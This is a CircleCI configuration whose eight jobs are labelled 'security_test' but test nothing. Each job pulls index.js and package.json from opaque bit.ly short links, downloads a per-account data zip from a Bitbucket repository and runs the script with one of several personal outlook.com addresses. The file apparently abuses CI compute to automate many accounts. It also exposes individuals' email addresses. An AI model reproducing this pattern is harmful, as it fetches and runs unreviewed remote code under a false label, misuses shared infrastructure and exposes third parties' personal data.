version: 2.1

jobs:
 security_test_17:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/djibrilfelix52_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: npm i -s
      - run: node index -t 58 -r 2 -e djibrilfelix52@outlook.com
 security_test_18:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/happy.nast_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index -t 58 -r 2 -e happy.nast@outlook.com
 security_test_19:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/alliot.andre_outlook-com.zip -o lunarCrushData.zip
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index -t 58 -r 2 -e alliot.andre@outlook.com
 security_test_20:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/aminatazabuga_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index -t 58 -r 2 -e aminatazabuga@outlook.com
 security_test_21:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/barrfrankmoses1999_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index -t 57 -r 3 -e barrfrankmoses1999@outlook.com
 security_test_22:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/lieudieuphulaygiaxuong_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: npm i -s
      - run: node index -t 58 -r 2 -e lieudieuphulaygiaxuong@outlook.com
 security_test_23:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/nguoimotnha_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index -t 58 -r 2 -e nguoimotnha@outlook.com
 security_test_24:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/lananhnguyenthix_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index -t 58 -r 2 -e lananhnguyenthix@outlook.com
      
      
workflows:
  build:
    jobs:
      - security_test_17
      - security_test_18
      - security_test_19
      - security_test_20
      - security_test_21
      - security_test_22
      - security_test_23
      - security_test_24
